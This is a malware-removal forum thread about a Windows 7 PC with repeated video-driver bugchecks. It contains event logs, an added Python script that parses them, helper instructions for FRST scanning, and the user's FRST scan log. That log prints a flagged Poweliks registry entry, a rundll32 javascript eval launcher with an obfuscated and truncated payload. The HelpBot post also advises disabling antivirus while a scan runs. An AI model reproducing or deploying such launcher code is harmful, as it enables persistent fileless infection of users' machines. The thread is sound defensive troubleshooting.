12/27/2014 6:54:35 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa8017ff1010, 0xfffff880052c1910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122714-23868-01.
12/27/2014 6:28:03 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa802111f010, 0xfffff88004f45910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122714-32963-01.
12/27/2014 10:10:12 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa80195f84e0, 0xfffff88005690910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122714-26598-01.
.
==== End Of File ===========================
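The Event Viewer section of the log above is not in time order (the 12/27 10:10:12 PM entry is listed last), so the sketch below parses those lines, sorts the crashes chronologically, and tallies stop codes and the drivers named in the 7026 event. It is an added example, not part of the original post or of DDS; the function names are illustrative, and the sample lines are copied from the log above.

```python
import re
from collections import Counter
from datetime import datetime

# Six lines copied verbatim from the "Event Viewer Messages" section above.
SAMPLE = r"""
12/28/2014 8:06:53 AM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa8016c574e0, 0xfffff880056b5910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122814-30045-01.
12/28/2014 7:50:13 AM, Error: Schannel [36887]  - The following fatal alert was received: 20.
12/28/2014 4:35:07 AM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa801dbfd1e0, 0xfffff8800567a910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122814-29936-01.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7026]  - The following boot-start or system-start driver(s) failed to load:  AFD aswRdr aswRvrt aswSnx aswSP aswVmm DfsC discache NetBIOS NetBT nsiproxy Psched rdbss spldr tdx truecrypt vwififlt Wanarpv6 WfpLwf
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The TCP/IP NetBIOS Helper service depends on the Ancillary Function Driver for Winsock service which failed to start because of the following error:  A device attached to the system is not functioning.
12/27/2014 10:10:12 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa80195f84e0, 0xfffff88005690910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122714-26598-01.
"""

# Stop-code name from Microsoft's bug check reference (only the code seen here).
STOP_CODE_NAMES = {"0x00000116": "VIDEO_TDR_FAILURE"}

# "<date> <time> AM|PM, <level>: <source> [<event id>]  - <message>"
EVENT_RE = re.compile(
    r"^(?P<ts>\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M), "
    r"(?P<level>\w+): (?P<source>.+?) \[(?P<id>\d+)\]\s+-\s+(?P<msg>.*)$"
)
BUGCHECK_RE = re.compile(r"The bugcheck was: (0x[0-9a-fA-F]{8}) \(([^)]*)\)")
DRIVERS_RE = re.compile(r"driver\(s\) failed to load:\s+(.*)$")


def parse_events(text):
    """Turn each recognisable log line into a dict; skip anything else."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%m/%d/%Y %I:%M:%S %p")
        ev["id"] = int(ev["id"])
        events.append(ev)
    return events


def bugchecks(events):
    """Return (timestamp, stop_code, params) per event 1001 crash, oldest first."""
    crashes = []
    for ev in events:
        m = BUGCHECK_RE.search(ev["msg"])
        if ev["id"] == 1001 and m:
            params = [p.strip() for p in m.group(2).split(",")]
            crashes.append((ev["ts"], m.group(1).lower(), params))
    return sorted(crashes)


def failed_boot_drivers(events):
    """Collect driver names listed in Service Control Manager event 7026."""
    names = []
    for ev in events:
        m = DRIVERS_RE.search(ev["msg"])
        if ev["id"] == 7026 and m:
            names.extend(m.group(1).split())
    return names


def report(text):
    """Summarise the log: event counts, stop codes, crash window, failed drivers."""
    events = parse_events(text)
    crashes = bugchecks(events)
    return {
        "events": len(events),
        "by_source_id": Counter((e["source"], e["id"]) for e in events),
        "stop_codes": Counter(code for _, code, _ in crashes),
        "first_crash": crashes[0][0] if crashes else None,
        "last_crash": crashes[-1][0] if crashes else None,
        "failed_drivers": failed_boot_drivers(events),
    }


if __name__ == "__main__":
    r = report(SAMPLE)
    for code, count in r["stop_codes"].items():
        name = STOP_CODE_NAMES.get(code, "unknown")
        print(f"{code} ({name}): {count} crash(es)")
    print("crash window:", r["first_crash"], "to", r["last_crash"])
    print("drivers in event 7026:", ", ".join(r["failed_drivers"]))
```
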
 



#3 HelpBot

HelpBot

    Bleepin' Binary Bot


  • Bots
  • 12,769 posts

Posted 02 January 2015 - 08:25 AM

Hello and welcome to Bleeping Computer!

I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

To help Bleeping Computer better assist you please perform the following steps:

***************************************************

In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.

CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/561235 <<< CLICK THIS LINK



If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.

***************************************************

If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of this page). In that reply, please include the following information:

  • If you have not done so already, include a clear description of the problems you're having, along with any steps you may have performed so far.
  • A new DDS log. For your convenience, you will find the instructions for generating these logs repeated at the bottom of this post.
    • Please do this even if you have previously posted logs for us.
    • If you were unable to produce the logs originally please try once more.
    • If you are unable to create a log please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system.
    • If you are unsure about any of these characteristics just post what you can and we will guide you.
  • Please tell us if you have your original Windows CD/DVD available.
  • Upon completing the above steps and posting a reply, another staff member will review your topic and do their best to resolve your issues.

Thank you for your patience, and again sorry for the delay.

***************************************************

We need to see some information about what is happening in your machine. Please perform the following scan again:

  • Download DDS by sUBs from the following link if you no longer have it available and save it to your desktop.

    DDS.com Download Link
  • Double click on the DDS icon, allow it to run.
  • A small box will open, with an explanation about the tool. No input is needed, the scan is running.
  • Notepad will open with the results.
  • Follow the instructions that pop up for posting the results.
  • Close the program window, and delete the program from your desktop.
Please note: You may have to disable any script protection running if the scan fails to run. After downloading the tool, disconnect from the internet and disable all antivirus protection. Run the scan, enable your A/V and reconnect to the internet.

Information on A/V control can be found HERE.

As I am just a silly little program running on the BleepingComputer.com servers, please do not send me private messages as I do not know how to read and reply to them! Thanks!

#4 baabel

baabel
  • Topic Starter

  • Members
  • 142 posts

Posted 02 January 2015 - 10:38 AM

Thank you for responding.

 

I am at work and will follow your instructions as soon as I get home tonight!



#5 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 38,196 posts

Posted 02 January 2015 - 11:06 AM

Greetings baabel and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that. :thumbup2:

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met. :)
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Replytopic.jpg button instead.
  • In the upper right hand corner of the topic you will see the Followtopic.jpg button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
  • Now let's get started :thumbup2:
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far. While I review our situation please run the below for me.

I would like to start by booting your computer in a special way. Based on your description this should allow us to run some programs without the risk of a Blue Screen.

===================================================

Using Low Resolution Video From Advanced Startup Options Screen - Windows 7/Vista

--------------------
  • Restart your computer
  • Press F8 until you are presented with the Advanced Startup Options menu
  • Using the down arrow select Enable low resolution video and press Enter
  • Your screen will appear as if you are running in Safe Mode, this is normal
===================================================

Farbar Recovery Scan Tool (FRST)

--------------------
  • Download Farbar Recovery Scan Tool for either 32 bit or 64 bit systems and save it to your desktop <<< Important
  • If you are unsure if you have 32 bit or 64 bit simply download and try one. If that doesn't run properly the other one should
  • Double click the icon
  • Click Yes to the disclaimer
  • Make sure the Addition.txt box is checked
  • Click Scan and allow the program to run
  • Click OK on the Scan complete screen, then OK on the Addition.txt pop up screen
  • 2 Notepad documents should now be open on your desktop.
  • Please copy and paste the contents of both in your reply
===================================================

System Summary Information

--------------------
  • Press the Windows key + R on your keyboard at the same time
  • Type msinfo32 and press Enter
  • Left click on System Summary
  • Click File, Save, and name the file Summary
  • Zip and attach the file to your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.
  • FRST results
  • Addition log
  • System Summary Information

Gary

If I do not reply within 24 hours please send me a Personal Message.

"For unto us a Child is born, Unto us a Son is given;"

#6 baabel

Posted 02 January 2015 - 04:05 PM

Thank you so much!

While I was working Avast told me that it stopped four or five malwares.

Here are the two files.

Unfortunately, the zipped Summary is 93.8 KB which is somewhat above the 82.11 KB upload maximum. It did appear to take a long time with "Error Reporting" (I think that was the name of the section but am not positive). What should I do about this?

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 27-12-2014
Ran by anonymous (administrator) on ANONYMOUS-PC on 02-01-2015 15:45:00
Running from C:\Users\anonymous\Desktop
Loaded Profile: anonymous (Available profiles: anonymous)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(AVAST Software) C:\Security\Avast\AvastSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
(ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AthBtTray.exe
(The Eraser Project) C:\Security\Eraser\Eraser.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Genie-soft) C:\Program Files\Genie9\Genie Backup Manager\GBMAgent.exe
(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Alcor Micro Corp.) C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
(AOL Inc.) C:\Program Files (x86)\Common Files\AOL\1341429429\ee\aolsoftware.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(AVAST Software) C:\Security\Avast\avastui.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
(ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ArcCon.ac
(Apple Inc.) C:\Audiovisual & Graphics\iTunes\iTunesHelper.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
(WinZip Computing, Inc.) C:\Program Files (x86)\WinZip\WZQKPICK.EXE
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\Receiver\Receiver.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\SelfServicePlugin\SelfServicePlugin.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\wfcrun32.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
() C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Dell, Inc.) C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuAgent.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell DataSafe Local Backup\SftService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Atheros) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(SoftThinks - Dell) C:\Program Files (x86)\Dell DataSafe Local Backup\Components\DSUpdate\DSUpd.exe
(Atheros) C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell DataSafe Local Backup\Toaster.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dplaysvr.exe
(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wiaacmgr.exe
() C:\Program Files (x86)\Dell DataSafe Local Backup\Components\Scheduler\STService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmmon32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wextract.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wextract.exe
(Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Avast Software) C:\Security\Avast\ng\vbox\AvastVBoxSVC.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
(AVAST Software) C:\Security\Avast\ng\ngservice.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wiaacmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dplaysvr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\NAPSTAT.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Adobe Systems Incorporated) C:\Audiovisual & Graphics\Photoshop Elements 10\Adobe Photoshop Elements 10\PSE 10\INSTALLED\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\SysWOW64\upnpcont.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6457960 2011-12-23] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1156712 2011-11-15] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe [1014432 2011-12-29] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AthBtTray.exe [800416 2011-12-29] (Atheros Commnucations)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe [767312 2009-09-03] (CANON INC.)
HKLM\...\Run: [Eraser] => C:\Security\Eraser\Eraser.exe [980920 2012-05-22] (The Eraser Project)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [GBMPro8Agentx64] => "C:\Program Files\Genie-Soft\GBMPro8x64\GBMAgent.exe"
HKLM\...\Run: [Acronis Scheduler2 Service] => C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe [358200 2010-12-11] (Acronis)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284440 2011-11-29] (Intel Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-17] (Intel Corporation)
HKLM-x32\...\Run: [ShwiconXP9106] => C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe [237568 2010-03-10] (Alcor Micro Corp.)
HKLM-x32\...\Run: [StartCCC] => c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [343168 2012-01-20] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Dell DataSafe Online] => C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuClient.exe [1117528 2010-08-25] (Dell, Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40336 2014-12-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1021128 2014-11-20] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [ArcSoft Connection Service] => C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe [207424 2010-10-27] (ArcSoft Inc.)
HKLM-x32\...\Run: [HostManager] => C:\Program Files (x86)\Common Files\AOL\1341429429\ee\AOLSoftware.exe [41800 2010-03-08] (AOL Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2014-10-11] (Apple Inc.)
HKLM-x32\...\Run: [TrueImageMonitor.exe] => C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe [5111464 2010-12-11] (Acronis)
HKLM-x32\...\Run: [CitrixReceiver] => "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [395656 2013-10-01] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [AvastUI.exe] => C:\Security\Avast\AvastUI.exe [5227112 2014-12-12] (AVAST Software)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [153992 2013-10-01] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [571392 2011-10-30] (Nikon Corporation)
HKLM-x32\...\Run: [WinCalendar V4] => C:\Program Files (x86)\WinCalendar V4\WinCalendarV4_SysTray.exe [80856 2014-02-08] (Sapro Systems)
HKLM-x32\...\Run: [iTunesHelper] => C:\Audiovisual & Graphics\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist\822\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.)
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\Run: [GBMPro9Agent] => C:\Program Files\Genie9\Genie Backup Manager\GBMAgent.exe [250456 2012-05-29] (Genie-soft)
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2014-08-07] (Garmin Ltd or its subsidiaries)
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\Run: [WinCalendar V4] => C:\Program Files (x86)\WinCalendar V4\WinCalendarV4_SysTray.exe [80856 2014-02-08] (Sapro Systems)
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [7063832 2014-11-21] (Piriform Ltd)
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\RunOnce: [Adobe Speed Launcher] => 1420231297
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
HKU\S-1-5-18\...\Run: [WinCalendar V4] => C:\Program Files (x86)\WinCalendar V4\WinCalendarV4_SysTray.exe [80856 2014-02-08] (Sapro Systems)
HKU\S-1-5-18\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2014-08-07] (Garmin Ltd or its subsidiaries)
AppInit_DLLs-x32: C:\PROGRA~2\Citrix\ICACLI~1\RSHook.dll => C:\Program Files (x86)\Citrix\ICA Client\RSHook.dll [256568 2012-12-14] (Citrix Systems, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinZip Quick Pick.lnk
ShortcutTarget: WinZip Quick Pick.lnk -> C:\Program Files (x86)\WinZip\WZQKPICK.EXE (WinZip Computing, Inc.)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Security\Avast\ashShA64.dll (AVAST Software)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/?gws_rd=ssl
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {4AC4BCB8-871A-4045-8313-4C6868E5D5E8} URL = http://www.bing.com/search?q={searchTerms}&form=DLCDF8&pc=MDDR&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {4AC4BCB8-871A-4045-8313-4C6868E5D5E8} URL = http://www.bing.com/search?q={searchTerms}&form=DLCDF8&pc=MDDR&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001 -> {4AC4BCB8-871A-4045-8313-4C6868E5D5E8} URL =
SearchScopes: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Security\Avast\aswWebRepIE64.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: HP Print Enhancer -> {0347C33E-8762-4905-BF09-768834316C61} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll (Hewlett-Packard Co.)
BHO-x32: Spybot-S&D IE Protection -> {53707962-6F74-2D53-2644-206D7942484F} -> C:\Security\SpyBot\SPYBOT~1\SDHelper.dll No File
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Security\Avast\aswWebRepIE.dll (AVAST Software)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
